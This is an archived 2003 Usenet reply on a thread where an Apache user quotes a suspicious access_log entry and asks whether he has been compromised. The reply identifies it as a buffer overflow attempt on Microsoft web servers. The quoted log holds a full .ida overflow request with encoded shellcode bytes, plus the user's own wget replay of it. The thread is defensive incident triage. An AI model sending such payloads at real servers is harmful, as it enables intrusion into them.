Re: I think I've been cracked, please check out.
From: Bill Unruh (unruh@string.physics.ubc.ca)
Date: 02/22/03
- Previous message: Les Mikesell: "Re: Secure FTP Lin -> Win"
- In reply to: Amir Hardon: "I think I've been cracked, please check out."
- Next in thread: David: "Re: I think I've been cracked, please check out."
- Reply: David: "Re: I think I've been cracked, please check out."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: unruh@string.physics.ubc.ca (Bill Unruh) Date: 22 Feb 2003 04:11:05 GMT
Amir Hardon <hardon*antispam-remove*@actcom.co.il> writes:
]I have apache 1.3.27 on an up to date redhat machine.
]I found the following line in my apache access_log:
]165.76.68.202 - - [18/Feb/2003:13:54:19 +0200] "GET
]/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
]HTTP/1.0" 400 326 "-" "-"
]I sent a similar request and that was it's log:
]127.0.0.1 - - [21/Feb/2003:23:58:07 +0200] "GET
]/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%25u9090%25u6858%25ucbd3%25u7801%25u9090%25u6858%25ucbd3%25u7801%25u9090%25u6858%25ucbd3%25u7801%25u9090%25u9090%25u8190%25u00c3%25u0003%25u8b00%25u531b%25u53ff%25u0078%25u0000%25u00=a
]HTTP/1.0" 404 279 "-" "Wget/1.8.2"
]Note that the original request has responded by a 400 error and my request
]was responded with a 404,
]another wierd thing is that the original requests do not got into the
]error_log!
]I haven't found any CVE about such exploit...
]The only diffrence that can be between the requests is a diffrent header.
]Have I been cracked? (My network connection is very slow lately and I am a
]bit worried) communication has become very slow).
KLEZ -- attempting to do a buffer overflow attack on a Microsoft Web
server. Do yourun a Microsoft web server? If not, do not worry.
- Next message: David: "Re: I think I've been cracked, please check out."
- Previous message: Les Mikesell: "Re: Secure FTP Lin -> Win"
- In reply to: Amir Hardon: "I think I've been cracked, please check out."
- Next in thread: David: "Re: I think I've been cracked, please check out."
- Reply: David: "Re: I think I've been cracked, please check out."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
